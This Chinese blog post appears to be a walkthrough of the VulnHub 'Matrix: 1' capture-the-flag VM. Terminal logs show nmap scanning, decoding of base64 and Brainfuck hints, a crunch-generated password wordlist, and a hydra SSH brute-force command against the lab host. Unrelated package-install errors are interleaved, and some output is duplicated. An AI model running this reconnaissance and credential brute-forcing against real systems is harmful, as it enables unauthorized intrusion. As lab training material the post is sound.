MATRIX: 1 ctf challenge

最新推荐文章于 2024-04-27 23:33:25 发布

32进制

最新推荐文章于 2024-04-27 23:33:25 发布

阅读量3.7k

点赞数

分类专栏： ctf 文章标签：网络安全 udp tcp/ip

本文链接：https://blog.csdn.net/m0_47210241/article/details/121550360

版权

ctf 专栏收录该内容

23 篇文章 1 订阅

订阅专栏

MATRIX: 1

About Release

Back to the Top

Name: Matrix: 1
Date release: 19 Aug 2018
Author: Ajay Verma
Series: Matrix

Download

Back to the Top

Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!

Machine_Matrix.zip (Size: 552 MB)
Download: https://mega.nz/#!CiwBjRZB!EtKOQvDQjytMq3LkkMgrHDC9EYxEz8mqpOg5M2N1OOk
Download (Mirror): https://download.vulnhub.com/matrix/Machine_Matrix.zip
Download (Torrent): https://download.vulnhub.com/matrix/Machine_Matrix.zip.torrent ( Magnet)

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# ll
总用量 107916
-rw-r–r-- 1 kwkl kwkl 972 11月 1 13:59 api
-rw-r–r-- 1 kwkl kwkl 46501062 10月 14 01:04 Nessus-8.15.2-debian6_amd64.deb
-rw-r–r-- 1 kwkl kwkl 31958540 11月 23 23:35 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb
-rw-r–r-- 1 kwkl kwkl 32038036 11月 23 23:34 python3-pyqt5-dbg_5.15.2+dfsg-3_arm64.deb

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# dpkg -i ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb

dpkg: 错误: 无法访问归档 ‘ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb’: 没有那个文件或目录

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# dpkg -i python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb 2 ⨯

正在选中未选择的软件包 python3-pyqt5-dbg。
(正在读取数据库 … 系统当前共安装有 270587 个文件和目录。)
准备解压 python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb …
正在解压 python3-pyqt5-dbg (5.15.2+dfsg-3) …
dpkg: 依赖关系问题使得 python3-pyqt5-dbg 的配置工作不能继续：
python3-pyqt5-dbg 依赖于 python3-dbg；然而：
未安装软件包 python3-dbg。
python3-pyqt5-dbg 依赖于 python3-pyqt5 (= 5.15.2+dfsg-3)；然而：
未安装软件包 python3-pyqt5。
python3-pyqt5-dbg 依赖于 python3-pyqt5.sip-dbg (>= 12.8)；然而：
未安装软件包 python3-pyqt5.sip-dbg。

dpkg: 处理软件包 python3-pyqt5-dbg (–install)时出错：
依赖关系问题 - 仍未被配置
在处理时有错误发生：
python3-pyqt5-dbg

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# apt install python3-dbg python3-pyqt5.sip-dbg python3-pyqt5 1 ⨯
正在读取软件包列表… 完成
正在分析软件包的依赖关系树… 完成
正在读取状态信息… 完成
没有可用的软件包 python3-pyqt5.sip-dbg，但是它被其它的软件包引用了。
这可能意味着这个缺失的软件包可能已被废弃，
或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# apt install python3-dbg python3-pyqt5.sip-dbg python3-pyqt5 100 ⨯
正在读取软件包列表… 完成
正在分析软件包的依赖关系树… 完成
正在读取状态信息… 完成
没有可用的软件包 python3-pyqt5.sip-dbg，但是它被其它的软件包引用了。
这可能意味着这个缺失的软件包可能已被废弃，
或者只能在其他发布源中找到

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# nmap -n 172.16.70.0/24 100 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:37 HKT
Nmap scan report for 172.16.70.1
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
49158/tcp open unknown
49161/tcp open unknown
MAC Address: 00:50:56:C0:00:05 (VMware)

Nmap scan report for 172.16.70.2
Host is up (0.000097s latency).
All 1000 scanned ports on 172.16.70.2 are closed
MAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.139
Host is up (0.00074s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
31337/tcp open Elite
MAC Address: 00:0C:29:0D:35:13 (VMware)

Nmap scan report for 172.16.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 172.16.70.254 are filtered
MAC Address: 00:50:56:E2:9B:C8 (VMware)

Nmap scan report for 172.16.70.122
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
3000/tcp open ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 24.66 seconds

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# nmap -A -v -sS -sV -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
NSE: Script Post-scanning.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Read data files from: /usr/bin/…/share/nmap
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.63 seconds
Raw packets sent: 0 (0B) | Rcvd: 0 (0B)

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# nmap -A -v -sS -sV -p- 172.16.70.139
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 23:38 HKT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating NSE at 23:38
Completed NSE at 23:38, 0.00s elapsed
Initiating ARP Ping Scan at 23:38
Scanning 172.16.70.139 [1 port]
Completed ARP Ping Scan at 23:38, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:38
Completed Parallel DNS resolution of 1 host. at 23:38, 0.05s elapsed
Initiating SYN Stealth Scan at 23:38
Scanning 172.16.70.139 [65535 ports]
Discovered open port 22/tcp on 172.16.70.139
Discovered open port 80/tcp on 172.16.70.139
Discovered open port 31337/tcp on 172.16.70.139
Completed SYN Stealth Scan at 23:38, 2.14s elapsed (65535 total ports)
Initiating Service scan at 23:38
Scanning 3 services on 172.16.70.139
Completed Service scan at 23:38, 6.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 172.16.70.139
NSE: Script scanning 172.16.70.139.
Initiating NSE at 23:38
Completed NSE at 23:39, 1.41s elapsed
Initiating NSE at 23:39
Completed NSE at 23:39, 0.01s elapsed
Initiating NSE at 23:39
Completed NSE at 23:39, 0.00s elapsed
Nmap scan report for 172.16.70.139
Host is up (0.00050s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|http-title: Welcome in Matrix
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
| http-methods:
| Supported Methods: GET HEAD
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 00:0C:29:0D:35:13 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 17.103 days (since Sat Nov 6 21:11:21 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 172.16.70.139

NSE: Script Post-scanning.
Initiating NSE at 23:39
Completed NSE at 23:39, 0.00s elapsed
Initiating NSE at 23:39
Completed NSE at 23:39, 0.00s elapsed
Initiating NSE at 23:39
Completed NSE at 23:39, 0.00s elapsed
Read data files from: /usr/bin/…/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

┌──(root💀kwkl)-[/home/kwkl/下载]
└─#

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# echo “ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=” | base64 -d
echo "Then you’ll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
┌──(root💀kwkl)-[/home/kwkl/下载]
└─#

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# dpkg -i ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb

dpkg: 错误: 无法访问归档 ‘ython3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb’: 没有那个文件或目录

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# dpkg -i python3-pyqt5-dbg_5.15.2+dfsg-3_amd64.deb 2 ⨯

dpkg: 处理软件包 python3-pyqt5-dbg (–install)时出错：
依赖关系问题 - 仍未被配置
在处理时有错误发生：
python3-pyqt5-dbg

E: 软件包 python3-pyqt5.sip-dbg 没有可安装候选

Nmap scan report for 172.16.70.2
Host is up (0.000097s latency).
All 1000 scanned ports on 172.16.70.2 are closed
MAC Address: 00:50:56:EE:4E:08 (VMware)

Nmap scan report for 172.16.70.254
Host is up (0.00022s latency).
All 1000 scanned ports on 172.16.70.254 are filtered
MAC Address: 00:50:56:E2:9B:C8 (VMware)

Nmap scan report for 172.16.70.122
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
3000/tcp open ppp

Nmap done: 256 IP addresses (5 hosts up) scanned in 24.66 seconds

TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 172.16.70.139

┌──(root💀kwkl)-[/home/kwkl/下载]
└─#

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# cat Cypher.matrix
+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>— -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->— ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >—< ]>—
—.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-

++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> —.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- —<] >---- —.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>–. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- —.< +++[- >—<
]>— .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> —<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> —<] >—. <++++ ++++[ ->— ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >—< ]>— --.<+
+++++ ++[-> ----- —<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->— ----< ]>— ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++… <++++ +++[- >---- —<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
++.< +++++ [->-- —<] >-…< +++++ +++[- >---- ----< ]>— ----- —.-
–.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> —<] >---- --.<+ +++++ [->-- ----< ]>— ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- —<] >---- .<+++ [->++ +<]>+ +…<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
—<] >—. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >—< ]>–.
–.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> —<] >–.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->— ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->— ----- <]>-- ----- ----- —.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.— ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >—< ]>— ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->— ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->— ----- <]>-- ----- ----- —.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- —.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- —.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
—<] >---- .<+++ [->++ +<]>+ +.— -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- —.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- —<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++… <++++ +++[-
---- —<] >---- —.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->— ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- —<]
–.+ +++++ ++.<+ +++++ ++[-> ----- —<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->–
----- -<]>- —.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
—< ]>-.< +++++ +++[- >---- ----< ]>— -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- —.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->— ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.— ----. <++++ ++++[ ->— ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->— ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->— <]>-- ----. <++++ [->++ ++<]> ++…+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->— ----< ]>— --.<+ ++++[ ->— --<]>
----- —.- --.<

┌──(root💀kwkl)-[/home/kwkl/下载]
└─#

在线解码:http://ctf.ssleye.com/brain.html

+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

字符集

加密

解密

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# apt --fix-broken install crunch 100 ⨯
正在读取软件包列表… 完成
正在分析软件包的依赖关系树… 完成
正在读取状态信息… 完成
您也许需要运行“apt --fix-broken install”来修正上面的错误。
下列软件包有未满足的依赖关系：
fern-wifi-cracker : 依赖: python3-pyqt5 但是它将不会被安装
python3-pyqt5-dbg : 依赖: python3-dbg 但是它将不会被安装
依赖: python3-pyqt5 (= 5.15.2+dfsg-3) 但是它将不会被安装
依赖: python3-pyqt5.sip-dbg (>= 12.8) 但无法安装它
E: 有未能满足的依赖关系。请尝试不指明软件包的名字来运行“apt --fix-broken install”(也可以指定一个解决办法)。

──(root💀kwkl)-[/home/kwkl/下载]
└─# wget archive.kali.org/archive-key.asc //下载签名 100 ⨯

apt-key add archive-key.asc //安装签名

–2021-11-23 23:58:26-- http://archive.kali.org/archive-key.asc
正在解析主机 archive.kali.org (archive.kali.org)… 192.99.45.140
正在连接 archive.kali.org (archive.kali.org)|192.99.45.140|:80… 已连接。
已发出 HTTP 请求，正在等待回应… 200 OK
长度：3155 (3.1K) [application/octet-stream]
正在保存至: “archive-key.asc”

archive-key.asc 100%[====================================================>] 3.08K 2.51KB/s 用时 1.2s

2021-11-23 23:58:28 (2.51 KB/s) - 已保存 “archive-key.asc” [3155/3155])

//下载签名: 地址缺少协议类型.
下载完毕 --2021-11-23 23:58:28–
总用时：2.3s
下载了：1 个文件，1.2s (2.51 KB/s) 中的 3.1K
Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
gpg: 无法打开 ‘//安装签名’：没有那个文件或目录

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# 2 ⨯
apt-key add archive-key.asc

Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
OK

┌──(root💀kwkl)-[/home/kwkl/下载]
└─#

root@kali:~# crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260

crunch: 100% completed generating output
root@kali:~# ls
Desktop Documents Music Public Videos
dict.txt Downloads Pictures Templates
root@kali:~# cat dict.txt
k1ll0r0a
k1ll0r0b
k1ll0r0c
k1ll0r0d
k1ll0r0e
k1ll0r0f
k1ll0r0g
k1ll0r0h
k1ll0r0i
k1ll0r0j
k1ll0r0k
k1ll0r0l
k1ll0r0m
k1ll0r0n
k1ll0r0o
k1ll0r0p
k1ll0r0q
k1ll0r0r
k1ll0r0s
k1ll0r0t
k1ll0r0u
k1ll0r0v
k1ll0r0w
k1ll0r0x
k1ll0r0y
k1ll0r0z
k1ll0r1a
k1ll0r1b
k1ll0r1c
k1ll0r1d
k1ll0r1e
k1ll0r1f
k1ll0r1g
k1ll0r1h
k1ll0r1i
k1ll0r1j
k1ll0r1k
k1ll0r1l
k1ll0r1m
k1ll0r1n
k1ll0r1o
k1ll0r1p
k1ll0r1q
k1ll0r1r
k1ll0r1s
k1ll0r1t
k1ll0r1u
k1ll0r1v
k1ll0r1w
k1ll0r1x
k1ll0r1y
k1ll0r1z
k1ll0r2a
k1ll0r2b
k1ll0r2c
k1ll0r2d
k1ll0r2e
k1ll0r2f
k1ll0r2g
k1ll0r2h
k1ll0r2i
k1ll0r2j
k1ll0r2k
k1ll0r2l
k1ll0r2m
k1ll0r2n
k1ll0r2o
k1ll0r2p
k1ll0r2q
k1ll0r2r
k1ll0r2s
k1ll0r2t
k1ll0r2u
k1ll0r2v
k1ll0r2w
k1ll0r2x
k1ll0r2y
k1ll0r2z
k1ll0r3a
k1ll0r3b
k1ll0r3c
k1ll0r3d
k1ll0r3e
k1ll0r3f
k1ll0r3g
k1ll0r3h
k1ll0r3i
k1ll0r3j
k1ll0r3k
k1ll0r3l
k1ll0r3m
k1ll0r3n
k1ll0r3o
k1ll0r3p
k1ll0r3q
k1ll0r3r
k1ll0r3s
k1ll0r3t
k1ll0r3u
k1ll0r3v
k1ll0r3w
k1ll0r3x
k1ll0r3y
k1ll0r3z
k1ll0r4a
k1ll0r4b
k1ll0r4c
k1ll0r4d
k1ll0r4e
k1ll0r4f
k1ll0r4g
k1ll0r4h
k1ll0r4i
k1ll0r4j
k1ll0r4k
k1ll0r4l
k1ll0r4m
k1ll0r4n
k1ll0r4o
k1ll0r4p
k1ll0r4q
k1ll0r4r
k1ll0r4s
k1ll0r4t
k1ll0r4u
k1ll0r4v
k1ll0r4w
k1ll0r4x
k1ll0r4y
k1ll0r4z
k1ll0r5a
k1ll0r5b
k1ll0r5c
k1ll0r5d
k1ll0r5e
k1ll0r5f
k1ll0r5g
k1ll0r5h
k1ll0r5i
k1ll0r5j
k1ll0r5k
k1ll0r5l
k1ll0r5m
k1ll0r5n
k1ll0r5o
k1ll0r5p
k1ll0r5q
k1ll0r5r
k1ll0r5s
k1ll0r5t
k1ll0r5u
k1ll0r5v
k1ll0r5w
k1ll0r5x
k1ll0r5y
k1ll0r5z
k1ll0r6a
k1ll0r6b
k1ll0r6c
k1ll0r6d
k1ll0r6e
k1ll0r6f
k1ll0r6g
k1ll0r6h
k1ll0r6i
k1ll0r6j
k1ll0r6k
k1ll0r6l
k1ll0r6m
k1ll0r6n
k1ll0r6o
k1ll0r6p
k1ll0r6q
k1ll0r6r
k1ll0r6s
k1ll0r6t
k1ll0r6u
k1ll0r6v
k1ll0r6w
k1ll0r6x
k1ll0r6y
k1ll0r6z
k1ll0r7a
k1ll0r7b
k1ll0r7c
k1ll0r7d
k1ll0r7e
k1ll0r7f
k1ll0r7g
k1ll0r7h
k1ll0r7i
k1ll0r7j
k1ll0r7k
k1ll0r7l
k1ll0r7m
k1ll0r7n
k1ll0r7o
k1ll0r7p
k1ll0r7q
k1ll0r7r
k1ll0r7s
k1ll0r7t
k1ll0r7u
k1ll0r7v
k1ll0r7w
k1ll0r7x
k1ll0r7y
k1ll0r7z
k1ll0r8a
k1ll0r8b
k1ll0r8c
k1ll0r8d
k1ll0r8e
k1ll0r8f
k1ll0r8g
k1ll0r8h
k1ll0r8i
k1ll0r8j
k1ll0r8k
k1ll0r8l
k1ll0r8m
k1ll0r8n
k1ll0r8o
k1ll0r8p
k1ll0r8q
k1ll0r8r
k1ll0r8s
k1ll0r8t
k1ll0r8u
k1ll0r8v
k1ll0r8w
k1ll0r8x
k1ll0r8y
k1ll0r8z
k1ll0r9a
k1ll0r9b
k1ll0r9c
k1ll0r9d
k1ll0r9e
k1ll0r9f
k1ll0r9g
k1ll0r9h
k1ll0r9i
k1ll0r9j
k1ll0r9k
k1ll0r9l
k1ll0r9m
k1ll0r9n
k1ll0r9o
k1ll0r9p
k1ll0r9q
k1ll0r9r
k1ll0r9s
k1ll0r9t
k1ll0r9u
k1ll0r9v
k1ll0r9w
k1ll0r9x
k1ll0r9y
k1ll0r9z
root@kali:~#

┌──(root💀kwkl)-[/home/kwkl/下载]
└─# hydra -l guest -P dict.txt 172.16.70.139 ssh
